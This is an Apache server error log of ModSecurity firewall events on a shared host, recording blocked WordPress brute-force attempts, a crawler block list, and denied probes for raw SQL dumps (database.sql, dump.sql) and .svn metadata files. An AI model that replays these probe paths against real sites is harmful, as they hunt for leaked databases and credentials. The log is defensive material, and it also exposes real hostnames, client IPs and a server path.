[Tue May 26 13:45:35.436324 2026] [security2:error] [pid 536875:tid 537082] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWp-r_-FTveSGlx1H9-AAAANI"]
[Tue May 26 13:45:36.868902 2026] [security2:error] [pid 536875:tid 537088] [client 106.192.248.115:56526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWqOr_-FTveSGlx1H-FAAAANg"]
[Tue May 26 13:45:36.873805 2026] [security2:error] [pid 536875:tid 537088] [client 106.192.248.115:56526] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWqOr_-FTveSGlx1H-FAAAANg"]
[Tue May 26 13:45:37.211380 2026] [security2:error] [pid 544395:tid 544529] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWqBmrs7g3RMCdp8Xj1QAAAAQ"]
[Tue May 26 13:45:37.510242 2026] [security2:error] [pid 536875:tid 537107] [client 185.191.171.12:11464] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVWqer_-FTveSGlx1H-HAAAAOs"]
[Tue May 26 13:45:37.510428 2026] [security2:error] [pid 536875:tid 537107] [client 185.191.171.12:11464] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVWqer_-FTveSGlx1H-HAAAAOs"]
[Tue May 26 13:45:38.699769 2026] [security2:error] [pid 544395:tid 544455] [remote 54.38.29.86:52542] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVWqhmrs7g3RMCdp8Xj7QAAbTs"]
[Tue May 26 13:45:38.893301 2026] [security2:error] [pid 536875:tid 537078] [client 85.204.70.118:42876] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "shahvishaal.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahVWqur_-FTveSGlx1H-NAAAAM4"]
[Tue May 26 13:45:38.988019 2026] [security2:error] [pid 544395:tid 544541] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWqhmrs7g3RMCdp8Xj7gAAABA"]
[Tue May 26 13:45:39.721956 2026] [security2:error] [pid 536875:tid 536970] [remote 45.148.10.218:52079] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/database.sql"] [unique_id "ahVWq-r_-FTveSGlx1H-PwAApl4"]
[Tue May 26 13:45:40.062806 2026] [security2:error] [pid 536875:tid 536983] [remote 45.148.10.218:52079] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/dump.sql"] [unique_id "ahVWrOr_-FTveSGlx1H-QQAA9ms"]
[Tue May 26 13:45:40.223500 2026] [security2:error] [pid 536875:tid 536969] [remote 45.148.10.218:52079] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/backup.sql"] [unique_id "ahVWrOr_-FTveSGlx1H-QgAApF0"]
[Tue May 26 13:45:40.380848 2026] [security2:error] [pid 536875:tid 536956] [remote 45.148.10.218:52079] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.billing.mosykay.com"] [uri "/db.sql"] [unique_id "ahVWrOr_-FTveSGlx1H-RAAAtlA"]
[Tue May 26 13:45:40.919798 2026] [security2:error] [pid 544395:tid 544531] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWrBmrs7g3RMCdp8XkCQAAAAY"]
[Tue May 26 13:45:41.864198 2026] [security2:error] [pid 536875:tid 537114] [client 195.178.110.34:41002] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.christinaspromotions.com"] [uri "/___proxy_subdomain_cpanel/.svn/wc.db"] [unique_id "ahVWrer_-FTveSGlx1H-UQAAAPI"]
[Tue May 26 13:45:42.768281 2026] [security2:error] [pid 536875:tid 537017] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWrur_-FTveSGlx1H-WgAAAJE"]
[Tue May 26 13:45:42.791430 2026] [security2:error] [pid 544395:tid 544593] [client 129.222.147.134:55704] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWrhmrs7g3RMCdp8XkMQAAAEQ"]
[Tue May 26 13:45:42.791596 2026] [security2:error] [pid 544395:tid 544593] [client 129.222.147.134:55704] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWrhmrs7g3RMCdp8XkMQAAAEQ"]
[Tue May 26 13:45:43.177617 2026] [security2:error] [pid 536875:tid 537112] [client 195.178.110.34:41004] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.christinaspromotions.com"] [uri "/___proxy_subdomain_cpanel/.svn/wc.db"] [unique_id "ahVWr-r_-FTveSGlx1H-bAAAAPA"]
[Tue May 26 13:45:43.614961 2026] [security2:error] [pid 536875:tid 537079] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVWr-r_-FTveSGlx1H-cQAAAM8"]
[Tue May 26 13:45:43.750709 2026] [security2:error] [pid 536875:tid 537069] [client 78.47.98.55:7868] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVWr-r_-FTveSGlx1H-bQAAAMU"], referer: http://ucdc.co.in/
[Tue May 26 13:45:44.348054 2026] [security2:error] [pid 544395:tid 544583] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWrxmrs7g3RMCdp8XkRQAAADo"]
[Tue May 26 13:45:44.936097 2026] [security2:error] [pid 544395:tid 544502] [remote 143.198.237.186:54382] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 186.237.198.143.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVWsBmrs7g3RMCdp8XkTgAAGGo"]
[Tue May 26 13:45:45.164656 2026] [security2:error] [pid 536875:tid 536879] [remote 74.7.241.58:60380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVWser_-FTveSGlx1H-iwAAqQM"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/bn
[Tue May 26 13:45:46.321183 2026] [security2:error] [pid 536875:tid 537061] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWser_-FTveSGlx1H-mAAAAL0"]
[Tue May 26 13:45:46.556859 2026] [security2:error] [pid 536875:tid 536943] [remote 13.42.154.237:45834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.154.42.13.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahVWsur_-FTveSGlx1H-qQAA50M"]
[Tue May 26 13:45:46.973133 2026] [security2:error] [pid 544395:tid 544611] [client 85.204.70.118:48428] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.70.204.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVWshmrs7g3RMCdp8XkcwAAAFY"]
[Tue May 26 13:45:46.973306 2026] [security2:error] [pid 544395:tid 544611] [client 85.204.70.118:48428] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVWshmrs7g3RMCdp8XkcwAAAFY"]
[Tue May 26 13:45:47.507370 2026] [security2:error] [pid 544395:tid 544604] [client 106.192.248.115:56825] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWsxmrs7g3RMCdp8XkgwAAAE8"]
[Tue May 26 13:45:47.512545 2026] [security2:error] [pid 544395:tid 544604] [client 106.192.248.115:56825] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWsxmrs7g3RMCdp8XkgwAAAE8"]
[Tue May 26 13:45:47.595547 2026] [security2:error] [pid 544395:tid 544636] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWsxmrs7g3RMCdp8XkfQAAAG8"]
[Tue May 26 13:45:49.812120 2026] [security2:error] [pid 536875:tid 537106] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWter_-FTveSGlx1H-wAAAAOo"]
[Tue May 26 13:45:49.851937 2026] [security2:error] [pid 544395:tid 544638] [client 216.73.217.138:6413] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahVWtRmrs7g3RMCdp8XkogAAcVo"]
[Tue May 26 13:45:51.119376 2026] [core:crit] [pid 536875:tid 537051] (13)Permission denied: [client 52.167.144.220:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:45:51.729522 2026] [security2:error] [pid 536875:tid 537062] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWt-r_-FTveSGlx1H-2gAAAL4"]
[Tue May 26 13:45:52.929651 2026] [security2:error] [pid 544395:tid 544539] [client 129.222.147.134:54507] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWuBmrs7g3RMCdp8XkygAAAA4"]
[Tue May 26 13:45:52.930457 2026] [security2:error] [pid 544395:tid 544539] [client 129.222.147.134:54507] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWuBmrs7g3RMCdp8XkygAAAA4"]
[Tue May 26 13:45:53.491688 2026] [security2:error] [pid 544395:tid 544589] [client 64.233.173.227:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.xllent.in"] [uri "/index.php"] [unique_id "ahVWuBmrs7g3RMCdp8XkzgAAAEA"]
[Tue May 26 13:45:53.494930 2026] [security2:error] [pid 544395:tid 544540] [client 195.178.110.34:36274] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.christinaspromotions.com"] [uri "/___proxy_subdomain_cpanel/.svn/entries"] [unique_id "ahVWuRmrs7g3RMCdp8Xk1gAAAA8"]
[Tue May 26 13:45:53.501517 2026] [security2:error] [pid 544395:tid 544616] [client 65.109.81.157:29492] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "toronto121mortgage.com"] [uri "/process.php"] [unique_id "ahVWuRmrs7g3RMCdp8Xk1wAAAFs"], referer: http://toronto121mortgage.com/index.php
[Tue May 26 13:45:53.845123 2026] [security2:error] [pid 544395:tid 544639] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWuRmrs7g3RMCdp8Xk1AAAAHI"]
[Tue May 26 13:45:54.677767 2026] [security2:error] [pid 536875:tid 536920] [remote 103.245.34.226:39580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.34.245.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVWuur_-FTveSGlx1H-_gAAxCw"]
[Tue May 26 13:45:55.525118 2026] [security2:error] [pid 544395:tid 544569] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWuxmrs7g3RMCdp8Xk8QAAACw"]
[Tue May 26 13:45:55.812498 2026] [core:crit] [pid 544395:tid 544613] (13)Permission denied: [client 40.77.167.56:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:45:56.572158 2026] [security2:error] [pid 544395:tid 544575] [client 91.84.124.42:56413] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.124.84.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVWvBmrs7g3RMCdp8XlEQAAADI"], referer: https://atreegroup.com/2022/12/15/architecture-is-not-based-on-concrete/
[Tue May 26 13:45:56.572310 2026] [security2:error] [pid 544395:tid 544575] [client 91.84.124.42:56413] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVWvBmrs7g3RMCdp8XlEQAAADI"], referer: https://atreegroup.com/2022/12/15/architecture-is-not-based-on-concrete/
[Tue May 26 13:45:56.662315 2026] [security2:error] [pid 544395:tid 544601] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWvBmrs7g3RMCdp8XlDgAAAEw"]
[Tue May 26 13:45:57.279285 2026] [security2:error] [pid 544395:tid 544481] [remote 103.95.119.103:51576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahVWvRmrs7g3RMCdp8XlGwAAKlU"]
[Tue May 26 13:45:57.754023 2026] [security2:error] [pid 544395:tid 544541] [client 106.192.248.115:57131] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWvRmrs7g3RMCdp8XlLgAAABA"]
[Tue May 26 13:45:57.754196 2026] [security2:error] [pid 544395:tid 544541] [client 106.192.248.115:57131] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVWvRmrs7g3RMCdp8XlLgAAABA"]
[Tue May 26 13:45:59.325605 2026] [security2:error] [pid 544395:tid 544646] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWvhmrs7g3RMCdp8XlPgAAAHk"]
[Tue May 26 13:46:00.460468 2026] [security2:error] [pid 536875:tid 537050] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWwOr_-FTveSGlx1H_SgAAALI"]
[Tue May 26 13:46:00.901278 2026] [core:error] [pid 536875:tid 537033] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:46:00.901303 2026] [core:error] [pid 536875:tid 537033] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:46:00.901419 2026] [security2:error] [pid 536875:tid 537033] [client 195.178.110.34:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.christinaspromotions.com"] [uri "/___proxy_subdomain_cpanel/index.php"] [unique_id "ahVWwOr_-FTveSGlx1H_YQAAAKE"]
[Tue May 26 13:46:00.903206 2026] [security2:error] [pid 544395:tid 544553] [client 195.178.110.34:57396] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.christinaspromotions.com"] [uri "/___proxy_subdomain_cpanel/"] [unique_id "ahVWwBmrs7g3RMCdp8XlUAAAABw"]
[Tue May 26 13:46:01.980758 2026] [security2:error] [pid 544395:tid 544396] [remote 46.101.54.125:46198] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.54.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVWwRmrs7g3RMCdp8XlVQAAMQA"]
[Tue May 26 13:46:02.230167 2026] [security2:error] [pid 544395:tid 544604] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWwRmrs7g3RMCdp8XlVwAAAE8"]
[Tue May 26 13:46:03.237864 2026] [security2:error] [pid 544395:tid 544546] [client 129.222.147.134:57742] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWwxmrs7g3RMCdp8XlXgAAABU"]
[Tue May 26 13:46:03.237979 2026] [security2:error] [pid 544395:tid 544546] [client 129.222.147.134:57742] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVWwxmrs7g3RMCdp8XlXgAAABU"]
[Tue May 26 13:46:03.918846 2026] [core:error] [pid 544395:tid 544543] [client 38.62.229.225:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:46:03.918867 2026] [core:error] [pid 544395:tid 544543] [client 38.62.229.225:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:46:04.025965 2026] [security2:error] [pid 536875:tid 537107] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVWw-r_-FTveSGlx1H_nAAAAOs"]
[Tue May 26 13:46:04.351757 2026] [core:error] [pid 544395:tid 544626] [client 38.62.229.224:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
